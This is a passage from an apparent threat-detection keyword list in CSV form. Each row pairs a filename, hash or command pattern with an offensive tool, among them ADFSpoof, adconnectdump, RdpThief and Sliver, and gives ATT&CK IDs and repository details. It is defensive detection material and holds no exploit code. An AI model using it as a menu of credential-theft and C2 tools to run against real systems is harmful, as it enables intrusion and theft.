T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADFSDump.sln*",".{0,1000}ADFSDump\.sln.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*ADFSpoof.py*",".{0,1000}ADFSpoof\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ADFSpoof-master*",".{0,1000}ADFSpoof\-master.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*ADFSpray.csv*",".{0,1000}ADFSpray\.csv.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*adfspray.git*",".{0,1000}adfspray\.git.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*ADFSpray.py*",".{0,1000}ADFSpray\.py.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*ADFSRelay -*",".{0,1000}ADFSRelay\s\-.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*ADFSRelay-main*",".{0,1000}ADFSRelay\-main.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*ADHunt-main.zip*",".{0,1000}ADHunt\-main\.zip.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*adidnsdump -u *",".{0,1000}adidnsdump\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*adidnsdump*",".{0,1000}adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*ad-ldap-enum.py*",".{0,1000}ad\-ldap\-enum\.py.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*ad-ldap-enum-main*",".{0,1000}ad\-ldap\-enum\-main.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*adm|admin|root|sudo|wheel*",".{0,1000}adm\|admin\|root\|sudo\|wheel.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*admin.kirbi*",".{0,1000}admin\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*admin_macos_x64 -rhost * -rport *",".{0,1000}admin_macos_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Admin2Sys.exe*",".{0,1000}Admin2Sys\.exe.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*Admin2Sys-main*",".{0,1000}Admin2Sys\-main.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*AD-miner -*",".{0,1000}AD\-miner\s\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*Adminisme/ServerScan/*",".{0,1000}Adminisme\/ServerScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*Administrator privileges required to spoof processes*",".{0,1000}Administrator\sprivileges\srequired\sto\sspoof\sprocesses.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*adobe_top100_pass.txt*",".{0,1000}adobe_top100_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*adsearch* --domain-admins*",".{0,1000}adsearch.{0,1000}\s\-\-domain\-admins.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*adsearch.exe*",".{0,1000}adsearch\.exe.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSearch.exe*",".{0,1000}ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ADSearch.sln*",".{0,1000}ADSearch\.sln.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSearch\ADSearch.cs*",".{0,1000}ADSearch\\ADSearch\.cs.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*adsearch-master.zip",".{0,1000}adsearch\-master\.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*ADSync passwords can be read or modified as local administrator only for ADSync version *",".{0,1000}ADSync\spasswords\scan\sbe\sread\sor\smodified\sas\slocal\sadministrator\sonly\sfor\sADSync\sversion\s.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADSyncGather.exe*",".{0,1000}ADSyncGather\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*ADSyncQuery*ADSync.mdf*.txt*",".{0,1000}ADSyncQuery.{0,1000}ADSync\.mdf.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*Advanced-SQL-Injection-Cheatsheet*",".{0,1000}Advanced\-SQL\-Injection\-Cheatsheet.{0,1000}","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2694","643","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" "*advantech_iview_networkservlet_cmd_inject.*",".{0,1000}advantech_iview_networkservlet_cmd_inject\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*adxcsouf2john.py*",".{0,1000}adxcsouf2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ADZero.py*",".{0,1000}ADZero\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","21","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z" "*ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676*",".{0,1000}ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16*",".{0,1000}ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384*",".{0,1000}ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe*",".{0,1000}ae17da575c55344775eb7b9d6d429265097a5bc90392862e0daea221e983d5fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14*",".{0,1000}ae19fadd759b7d9bd55fb0aebf9c903d129f9ca13c0240c7b1dc53c0c934fe14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9*",".{0,1000}ae205d0552b3a1a407d43025a1b85de9de6c9edaf7690aae3ef8ca03b07ec4a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74*",".{0,1000}ae2342b247b29e9e790ef5ca3bff74f49167b54a0c846321fb5e7e24bf892d74.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5*",".{0,1000}ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363*",".{0,1000}AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699*",".{0,1000}ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12*",".{0,1000}ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722*",".{0,1000}ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ae84192b77cec541a088d563dc5f20723123e096*",".{0,1000}ae84192b77cec541a088d563dc5f20723123e096.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102*",".{0,1000}ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 